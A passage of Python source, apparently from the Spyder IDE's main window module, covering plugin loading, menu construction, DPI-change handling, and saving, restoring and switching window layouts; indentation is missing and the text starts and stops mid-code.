self.thirdparty_plugins.append(self.pylint)
self.set_splash(_("Loading third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'CONFIGWIDGET_CLASS'):
self.preferences.register_plugin_preferences(plugin)
if hasattr(plugin, 'COMPLETION_PROVIDER_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except TypeError:
# Fixes spyder-ide/spyder#13977
pass
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# New API: Load and register external plugins
external_plugins = find_external_plugins()
plugin_deps = solve_plugin_dependencies(external_plugins.values())
for plugin_class in plugin_deps:
if issubclass(plugin_class, SpyderPluginV2):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Setting up main window..."))
# Help menu
# TODO: Once all the related plugins are migrated, and they add
# their own actions, this can be removed.
#----- Tours
# TODO: Move to plugin
self.tour = tour.AnimatedTour(self)
# self.tours_menu = QMenu(_("Interactive tours"), self)
# self.tour_menu_actions = []
# # TODO: Only show intro tour for now. When we are close to finish
# # 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(DEFAULT_TOUR)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
# def trigger(i=i, self=self): # closure needed!
# return lambda: self.show_tour(i)
# temp_action = create_action(self, tour_name, tip="",
# triggered=trigger())
# self.tour_menu_actions += [temp_action]
# self.tours_menu.addActions(self.tour_menu_actions)
self.tour_action = create_action(
self,
self.tours_available[DEFAULT_TOUR]['name'],
tip=_("Interactive tour introducing Spyder's panes and features"),
triggered=lambda: self.show_tour(DEFAULT_TOUR))
self.mainmenu.add_item_to_application_menu(
self.tour_action,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.Documentation)
# TODO: Move to plugin
# IPython documentation
if self.help is not None:
self.ipython_menu = SpyderMenu(
parent=self,
title=_("IPython documentation"))
intro_action = create_action(
self,
_("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(
self,
_("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(
self,
_("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(
self.ipython_menu,
(intro_action, guiref_action, quickref_action))
self.mainmenu.add_item_to_application_menu(
self.ipython_menu,
menu_id=ApplicationMenus.Help,
section=HelpMenuSections.ExternalDocumentation,
before_section=HelpMenuSections.About)
# ----- View
# View menu
# Menus
self.plugins_menu = SpyderMenu(parent=self, title=_("Panes"))
self.quick_layout_menu = SpyderMenu(
parent=self,
title=_("Window layouts"))
self.quick_layout_set_menu()
# Panes section
self.mainmenu.add_item_to_application_menu(
self.plugins_menu,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Pane)
self.mainmenu.add_item_to_application_menu(
self.lock_interface_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Pane)
self.mainmenu.add_item_to_application_menu(
self.close_dockwidget_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Pane)
self.mainmenu.add_item_to_application_menu(
self.maximize_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Pane)
# Toolbar section
self.mainmenu.add_item_to_application_menu(
self.toolbar.toolbars_menu,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Toolbar)
self.mainmenu.add_item_to_application_menu(
self.toolbar.show_toolbars_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Toolbar)
# Layout section
self.mainmenu.add_item_to_application_menu(
self.quick_layout_menu,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Layout)
self.mainmenu.add_item_to_application_menu(
self.toggle_previous_layout_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Layout)
self.mainmenu.add_item_to_application_menu(
self.toggle_next_layout_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Layout)
# Bottom section
self.mainmenu.add_item_to_application_menu(
self.fullscreen_action,
menu_id=ApplicationMenus.View,
section=ViewMenuSections.Bottom)
# TODO: Migrate to use the MainMenu Plugin instead of list of actions
# Filling out menu/toolbar entries:
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
logger.info("Setting up window...")
self.setup_layout(default=False)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
if isinstance(plugin, SpyderDockablePlugin):
self.tabify_plugin(plugin_instance)
plugin_instance.toggle_view(False)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
regex = re.compile(r'.*_.*_(\d+)[.]log')
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for __, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emitted by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
# Update lock status
self.toggle_lock(self.interface_locked)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
# Process pending events and hide splash before loading the
# previous session.
QApplication.processEvents()
if self.splash is not None:
self.splash.hide()
if self.open_project:
if not running_in_mac_app():
self.projects.open_project(
self.open_project, workdir=self.init_workdir
)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
# Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
screen = self.window().windowHandle().screen()
self.current_dpi = screen.logicalDotsPerInch()
screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, new_screen):
"""Connect DPI signals for new screen."""
if new_screen is not None:
new_screen_dpi = new_screen.logicalDotsPerInch()
if self.current_dpi != new_screen_dpi:
self.show_dpi_change_message(new_screen_dpi)
else:
new_screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def handle_dpi_change_response(self, result, dpi):
"""Handle dpi change message dialog result."""
if self.dpi_change_dismiss_box.isChecked():
self.show_dpi_message = False
self.dpi_change_dismiss_box = None
if result == 0: # Restart button was clicked
# Activate HDPI auto-scaling option since is needed for a
# proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Update current dpi for future checks
self.current_dpi = dpi
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
if not self.show_dpi_message:
return
if self.current_dpi != dpi:
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
self.dpi_change_dismiss_box = QCheckBox(
_("Hide this message during the current session"),
self
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_
("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > General > Interface</tt>, "
"in case Spyder is not displayed correctly.<br><br>"
"Do you want to restart Spyder?"))
msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(
_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(self.dpi_change_dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.finished.connect(
lambda result: self.handle_dpi_change_response(result, dpi))
msgbox.open()
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
elif running_in_mac_app() or is_pynsist():
title = "Spyder"
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
def load_window_settings(self, prefix, default=False, section='main'):
"""
Load window layout settings from userconfig-based configuration
with `prefix`, under `section`.
Parameters
----------
default: bool
If True, do not restore inner layout.
"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix + 'size')
prefs_dialog_size = get_func(section, prefix + 'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix + 'state', None)
pos = get_func(section, prefix + 'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See spyder-ide/spyder#3748.
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix + 'position')
is_maximized = get_func(section, prefix + 'is_maximized')
is_fullscreen = get_func(section, prefix + 'is_fullscreen')
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def get_window_settings(self):
"""
Return current window settings.
Symmetric to the 'set_window_settings' setter.
"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(
self.saveState(version=WINDOW_STATE_VERSION)
)
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""
Set window settings.
Symmetric to the 'get_window_settings' accessor.
"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
hexstate_valid = self.restoreState(
QByteArray().fromHex(str(hexstate).encode('utf-8')),
version=WINDOW_STATE_VERSION
)
# Check layout validity. Spyder 4 uses the version 0 state,
# whereas Spyder 5 will use version 1 state. For more info see the
# version argument for QMainWindow.restoreState:
# https://doc.qt.io/qt-5/qmainwindow.html#restoreState
if not hexstate_valid:
self.setUpdatesEnabled(True)
self.setup_layout(default=True)
return
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""
Save current window settings with `prefix` in
the userconfig-based configuration, under `section`.
"""
# Use current size and position when saving window settings.
# Fixes spyder-ide/spyder#13882
win_size = self.size()
pos = self.pos()
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix + 'size',
(win_size.width(), win_size.height()))
CONF.set(section, prefix + 'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix + 'is_maximized', self.isMaximized())
CONF.set(section, prefix + 'is_fullscreen', self.isFullScreen())
CONF.set(section, prefix + 'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState(version=WINDOW_STATE_VERSION)
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix + 'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwidgets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name, in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
# Old API
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
plugin._initialize_plugin_in_mainwindow_layout()
except AttributeError:
pass
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time."""
self.setUpdatesEnabled(False)
first_spyder_run = bool(self.first_spyder_run) # Store copy
if first_spyder_run:
self.set_window_settings(*settings)
else:
if self.last_plugin:
if self.last_plugin._ismaximized:
self.maximize_dockwidget(restore=True)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
min_width = self.minimumWidth()
max_width = self.maximumWidth()
base_width = self.width()
self.setFixedWidth(base_width)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# Define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
plots = self.plots
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
# Stored for tests
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
# Layout definition
# --------------------------------------------------------------------
# Layouts are organized by columns, each column is organized by rows.
# Widths have to accumulate to 100 (except if hidden), height per
# column has to accumulate to 100 as well
# Spyder Default Initial Layout
s_layout = {
'widgets': [
# Column 0
[[explorer_project]],
# Column 1
[[editor]],
# Column 2
[[outline]],
# Column 3
[[help_plugin, explorer_variable, plots, # Row 0
helper, explorer_file, finder] + plugins,
[console_int, console_ipy, history]] # Row 1
],
'width fraction': [15, # Column 0 width
45, # Column 1 width
5, # Column 2 width
45], # Column 3 width
'height fraction': [[100], # Column 0, row heights
[100], # Column 1, row heights
[100], # Column 2, row heights
[46, 54]], # Column 3, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# RStudio
r_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int]], # Row 1
# column 1
[[explorer_variable, plots, history, # Row 0
outline, finder] + plugins,
[explorer_file, explorer_project, # Row 1
help_plugin, helper]]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Matlab
m_layout = {
'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, plots, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [10, # Column 0 width
45, # Column 1 width
45], # Column 2 width
'height fraction': [[55, 45], # Column 0, row heights
[55, 45], # Column 1, row heights
[55, 45]], # Column 2, row heights
'hidden widgets': global_hidden_widgets,
'hidden toolbars': [],
}
# Vertically split
v_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int, explorer_file, # Row 1
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [100], # Column 0 width
'height fraction': [[55, 45]], # Column 0, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Horizontally split
h_layout = {
'widgets': [
# column 0
[[editor]], # Row 0
# column 1
[[console_ipy, console_int, explorer_file, # Row 0
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [55, # Column 0 width
45], # Column 1 width
'height fraction': [[100], # Column 0, row heights
[100]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': []
}
# Layout selection
layouts = {
'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout,
}
layout = layouts[index]
# Remove None from widgets layout
widgets_layout = layout['widgets']
widgets_layout_clean = []
for column in widgets_layout:
clean_col = []
for row in column:
clean_row = [w for w in row if w is not None]
if clean_row:
clean_col.append(clean_row)
if clean_col:
widgets_layout_clean.append(clean_col)
# Flatten widgets list
widgets = []
for column in widgets_layout_clean:
for row in column:
for widget in row:
widgets.append(widget)
# We use both directions to ensure proper update when moving from
# 'Horizontal Split' to 'Spyder Default'
# This also seems to help on random cases where the display seems
# 'empty'
for direction in (Qt.Vertical, Qt.Horizontal):
# Arrange the widgets in one direction
for idx in range(len(widgets) - 1):
first, second = widgets[idx], widgets[idx+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
direction)
# Arrange the widgets in the other direction
for column in widgets_layout_clean:
for idx in range(len(column) - 1):
first_row, second_row = column[idx], column[idx+1]
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout_clean:
for row in column:
for idx in range(len(row) - 1):
first, second = row[idx], row[idx+1]
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Set dockwidget widths
width_fractions = layout['width fraction']
if len(width_fractions) > 1:
_widgets = [col[0][0].dockwidget for col in widgets_layout]
self.resizeDocks(_widgets, width_fractions, Qt.Horizontal)
# Set dockwidget heights
height_fractions = layout['height fraction']
for idx, column in enumerate(widgets_layout_clean):
if len(column) > 1:
_widgets = [row[0].dockwidget for row in column]
self.resizeDocks(_widgets, height_fractions[idx], Qt.Vertical)
# Hide toolbars
hidden_toolbars = layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
if first_spyder_run:
self.first_spyder_run = False
else:
self.setMinimumWidth(min_width)
self.setMaximumWidth(max_width)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
self.setUpdatesEnabled(True)
self.sig_layout_setup_ready.emit(layout)
return layout
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
names = CONF.get('quick_layouts', 'names')
order = CONF.get('quick_layouts', 'order')
active = CONF.get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(
self,
_("Warning"),
_("<b>%s</b> will be overwritten. Do you want to "
"continue?") % name,
QMessageBox.Yes | QMessageBox.No
)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
CONF.set('quick_layouts', 'names', names)
CONF.set('quick_layouts', 'order', order)
CONF.set('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
section = 'quick_layouts'
names = CONF.get(section, 'names')
order = CONF.get(section, 'order')
active = CONF.get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
CONF.set(section, 'names', dlg.names)
CONF.set(section, 'order', dlg.order)
CONF.set(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The default layouts will always be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (ie, where the index is greater than the number of
# defaults). See spyder-ide/spyder#6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
action = plugin._toggle_view_action
except AttributeError:
# New API
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# TODO: To be removed after all actions are moved to their corresponding
# plugins
def register_shortcut(self, qaction_or_qshortcut, context, name,
add_shortcut_to_tip=True, plugin_name=None):
self.shortcuts.register_shortcut(
qaction_or_qshortcut,
context,
name,
add_shortcut_to_tip=add_shortcut_to_tip,
plugin_name=plugin_name,
)
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def update_source_menu(self):
"""Update source menu options that vary dynamically."""
# This is necessary to avoid an error at startup.
# Fixes spyder-ide/spyder#14901
try:
self.editor.refresh_formatter_name()
except AttributeError:
pass
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(action._shown_shortcut)
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.show_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu."""
menu_actions = menu.actions()
for action in menu_actions:
if getattr(action, '_shown_shortcut', False):
# This is a SpyderAction
if action._shown_shortcut is not None:
action.setShortcut(QKeySequence())
elif action.menu() is not None:
# This is submenu, so we need to call this again
self.hide_shortcuts(action.menu())
else:
# We don't need to do anything for other elements
continue
def hide_options_menus(self):
"""Hide options menu when menubar is pressed in macOS."""
for plugin in self.widgetlist + self.thirdparty_plugins:
if plugin.CONF_SECTION == 'editor':
editorstack = self.editor.get_current_editorstack()
editorstack.menu.hide()
else:
try:
# New API
plugin.options_menu.hide()
except AttributeError:
# Old API
plugin._options_menu.hide()
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if (not console and not_readonly and self.editor
and not self.editor.is_file_opened()):
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
